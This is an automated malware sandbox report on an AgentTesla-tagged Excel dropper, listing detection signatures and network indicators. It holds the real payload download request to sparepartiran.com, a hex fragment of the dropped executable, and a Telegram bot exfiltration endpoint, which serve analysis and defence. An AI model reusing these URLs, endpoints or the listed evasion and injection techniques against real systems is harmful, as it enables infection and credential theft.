Analysis Report x2hGv.xls

Overview

General Information

Sample Name:	x2hGv.xls
Analysis ID:	324119
MD5:	9e7c47bf75405a4007da5989a93e14ae
SHA1:	6f52910e199f61d3c4a6d165266322aa7e40beea
SHA256:	7937e499e1d7ddb1cf32b451e5745a70a1878fa658958cd64b1ff46142608bba
Tags:	AgentTeslaxls
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Yara detected AgentTesla

Bypasses PowerShell execution policy

Creates processes via WMI

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Powershell drops PE file

Sigma detected: Executables Started in Suspicious Folder

Sigma detected: Execution in Non-Executable Folder

Sigma detected: Suspicious Program Location Process Starts

Suspicious powershell command line found

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Antivirus or Machine Learning detection for unpacked file

Contains capabilities to detect virtual machines

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains embedded VBA macros

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Stores files to the Windows start menu directory

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Signatures

AV Detection:

Multi AV Scanner detection for domain / URL

Source: sparepartiran.com

Virustotal: Detection: 10%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\kzsuoseu.exe	Metadefender: Detection: 21%	Perma Link
Source: C:\Users\Public\kzsuoseu.exe	ReversingLabs: Detection: 55%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe	Metadefender: Detection: 21%	Perma Link
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe	ReversingLabs: Detection: 55%

Multi AV Scanner detection for submitted file

Source: x2hGv.xls

ReversingLabs: Detection: 22%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\VideoLAN\vlc.exe	Joe Sandbox ML: detected
Source: C:\Users\Public\kzsuoseu.exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 32.2.kzsuoseu.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 30.2.kzsuoseu.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: g.msn.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.5:49737 -> 162.223.88.131:80

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.5:49737 -> 162.223.88.131:80

Networking:

Downloads executable code via HTTP

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Nov 2020 11:02:53 GMTServer: ApacheLast-Modified: Thu, 26 Nov 2020 22:27:22 GMTAccept-Ranges: bytesContent-Length: 518656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 97 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 ee dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 dc 03 00 4b 00 00 00 00 e0 03 00 b8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 84 31 00 00 78 37 00 00 03 00 00 00 6f 00 00 06 fc 68 00 00 98 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 85 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 36 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 43 00 00 00 38 00 00 00 5f 00 00 00 38 3e 00 00 00 02 28 06 00 00 06 20 00 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 02 28 02 00 00 06 20 01 00 00 00 16 39 c2 ff ff ff 26 20 01 00 00 00 38 b7 ff ff ff 02 28 03 00 00 06 38 c2 ff ff ff 02 28 04 00 00 06 20 02 00 00 00 17 3a 9b ff ff ff 26 20 01 00 00 00 38 90 ff ff ff 2a 00 00 00 13 30 07 00 49 01 00 00 02 00 00 11 38 2a 00 00 00 fe 0c 02 00 45 07 00 00 00 11 00 00 00 67 00 00 00 83 00 00 00 b3 00 00 00 3c 00 00 00 a7 00 00 00 21 00 00 00 38 0c 00 00 00 20 d9 03 00 00 13 00 38 3a 00 00 00 17 28 09 00 00 06 20 02 00 00 00 38 be ff ff ff 2a 38 5c 00 00 00 20 00 00 00 00 28 08 00 00 06 39 a9 ff ff ff 26 38 9f ff ff ff 38 d0 ff ff ff 20 03 00 00 00 38 94 ff ff ff 73 02 00 00 0a 13 01 20 01 00 00 00 28 08 00 00 06 39 7e ff ff ff 26 38 74 ff ff ff 73 1d 00 00 06 13 05 20 05 00 00 00 28 08
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 28 Nov 2020 11:02:53 GMTServer: ApacheLast-Modified: Thu, 26 Nov 2020 22:27:22 GMTAccept-Ranges: bytesContent-Length: 518656Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 97 2b c0 5f 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 0b 00 00 be 03 00 00 2a 04 00 00 00 00 00 ee dc 03 00 00 20 00 00 00 e0 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a0 dc 03 00 4b 00 00 00 00 e0 03 00 b8 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 bc 03 00 00 20 00 00 00 be 03 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 26 04 00 00 e0 03 00 00 28 04 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 20 08 00 00 02 00 00 00 e8 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 dc 03 00 00 00 00 00 48 00 00 00 02 00 05 00 84 31 00 00 78 37 00 00 03 00 00 00 6f 00 00 06 fc 68 00 00 98 73 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 03 00 85 00 00 00 01 00 00 11 02 28 01 00 00 0a 38 36 00 00 00 38 f0 ff ff ff fe 0c 00 00 45 03 00 00 00 43 00 00 00 38 00 00 00 5f 00 00 00 38 3e 00 00 00 02 28 06 00 00 06 20 00 00 00 00 17 3a d9 ff ff ff 26 38 cf ff ff ff 02 28 02 00 00 06 20 01 00 00 00 16 39 c2 ff ff ff 26 20 01 00 00 00 38 b7 ff ff ff 02 28 03 00 00 06 38 c2 ff ff ff 02 28 04 00 00 06 20 02 00 00 00 17 3a 9b ff ff ff 26 20 01 00 00 00 38 90 ff ff ff 2a 00 00 00 13 30 07 00 49 01 00 00 02 00 00 11 38 2a 00 00 00 fe 0c 02 00 45 07 00 00 00 11 00 00 00 67 00 00 00 83 00 00 00 b3 00 00 00 3c 00 00 00 a7 00 00 00 21 00 00 00 38 0c 00 00 00 20 d9 03 00 00 13 00 38 3a 00 00 00 17 28 09 00 00 06 20 02 00 00 00 38 be ff ff ff 2a 38 5c 00 00 00 20 00 00 00 00 28 08 00 00 06 39 a9 ff ff ff 26 38 9f ff ff ff 38 d0 ff ff ff 20 03 00 00 00 38 94 ff ff ff 73 02 00 00 0a 13 01 20 01 00 00 00 28 08 00 00 06 39 7e ff ff ff 26 38 74 ff ff ff 73 1d 00 00 06 13 05 20 05 00 00 00 28 08

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 162.223.88.131 162.223.88.131

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: COLOUPUS COLOUPUS

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /js/2Q/0mrxdv.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /js/2Q/0mrxdv.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive

Source: global traffic	HTTP traffic detected: GET /js/2Q/0mrxdv.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /js/2Q/0mrxdv.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: sparepartiran.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: g.msn.com

Source: kzsuoseu.exe, 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: powershell.exe, 00000015.00000002.479159351.000001F1C27FD000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.493294610.0000022BEDB5B000.00000004.00000001.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000016.00000002.496165200.0000022BEDD0D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.micro
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: powershell.exe, 00000015.00000002.476805076.000001F1BA660000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: http://pYJvKF.com
Source: powershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: kzsuoseu.exe	String found in binary or memory: http://schemas.microso
Source: powershell.exe, 00000015.00000002.457583835.000001F1AA601000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.459466804.0000022B80001000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000015.00000002.467351207.000001F1AB300000.00000004.00000001.sdmp	String found in binary or memory: http://sparepartiran.c
Source: powershell.exe, 00000015.00000002.467224652.000001F1AB2E2000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.468576835.0000022B80B86000.00000004.00000001.sdmp	String found in binary or memory: http://sparepartiran.com
Source: powershell.exe, 00000016.00000002.470123468.0000022B80DD9000.00000004.00000001.sdmp	String found in binary or memory: http://sparepartiran.com/js/2Q/0m
Source: PowerShell_transcript.472847.mNQ4U7A3.20201128120249.txt.22.dr	String found in binary or memory: http://sparepartiran.com/js/2Q/0mrxdv.exe
Source: powershell.exe, 00000015.00000002.458808161.000001F1AA812000.00000004.00000001.sdmp, powershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmp	String found in binary or memory: http://sparepartiran.com/js/2Q/0mrxdv.exe0yPw
Source: powershell.exe, 00000015.00000002.467224652.000001F1AB2E2000.00000004.00000001.sdmp	String found in binary or memory: http://sparepartiran.comx
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: http://weather.service.msn.com/data.aspx
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000016.00000002.461243682.0000022B80213000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000003.474308723.00000000063F7000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000003.473687241.000000000640B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: kzsuoseu.exe, 0000001C.00000003.467671944.0000000006423000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.htmle
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: kzsuoseu.exe, 0000001C.00000003.473632022.000000000640B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersB
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: kzsuoseu.exe, 0000001C.00000003.473829271.000000000640B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersGK
Source: kzsuoseu.exe, 0000001C.00000003.473687241.000000000640B000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersx
Source: kzsuoseu.exe, 0000001C.00000003.474308723.00000000063F7000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.coma
Source: kzsuoseu.exe, 0000001C.00000003.474308723.00000000063F7000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comce2
Source: kzsuoseu.exe, 0000001A.00000002.509575861.00000000018A7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.comcom
Source: kzsuoseu.exe, 0000001A.00000002.509575861.00000000018A7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.come.comk
Source: kzsuoseu.exe, 0000001A.00000002.509575861.00000000018A7000.00000004.00000040.sdmp	String found in binary or memory: http://www.fontbureau.como
Source: kzsuoseu.exe, 0000001C.00000003.474308723.00000000063F7000.00000004.00000001.sdmp	String found in binary or memory: http://www.fontbureau.comueom
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: kzsuoseu.exe, 0000001C.00000003.470620927.000000000640B000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: kzsuoseu.exe, 0000001C.00000003.470620927.000000000640B000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/s
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000003.473393789.000000000640B000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: kzsuoseu.exe, 0000001C.00000003.470534192.000000000641F000.00000004.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmo
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: kzsuoseu.exe, 0000001A.00000002.522397681.00000000062B0000.00000002.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.519537292.00000000064E0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://analysis.windows.net/powerbi/api
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.aadrm.com/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.addins.omex.office.net/appinfo/query
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.addins.omex.office.net/appstate/query
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.diagnostics.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.diagnosticssdf.office.com
Source: kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.microsoftstream.com/api/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.office.net
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.onedrive.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.powerbi.com/beta/myorg/imports
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
Source: kzsuoseu.exe, 0000001A.00000002.511700350.00000000041C1000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001C.00000002.509493809.00000000035B6000.00000004.00000001.sdmp, kzsuoseu.exe, 0000001E.00000002.512846183.0000000000402000.00000040.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.512857021.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: kzsuoseu.exe, 0000001E.00000002.517410050.0000000002F81000.00000004.00000001.sdmp, kzsuoseu.exe, 00000020.00000002.517955962.00000000028D1000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://apis.live.net/v5.0/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://arc.msn.com/v4/api/selection
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://augloop.office.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://augloop.office.com/v2
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://autodiscover-s.outlook.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://cdn.entity.
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://client-office365-tas.msedge.net/ab
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://clients.config.office.net/
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/ios
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/mac
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://config.edge.skype.com
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/Office
Source: 915FEC95-1606-493C-B7E6-1E4392ED10F8.1.dr	String found in binary or memory: https://config.edge.skype.com/config/v2/Office
Source: powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000016.00000002.483459568.0000022B90060000.00000004.00000001.sdmp	String found in binary or memory: https://contoso.com/Icon
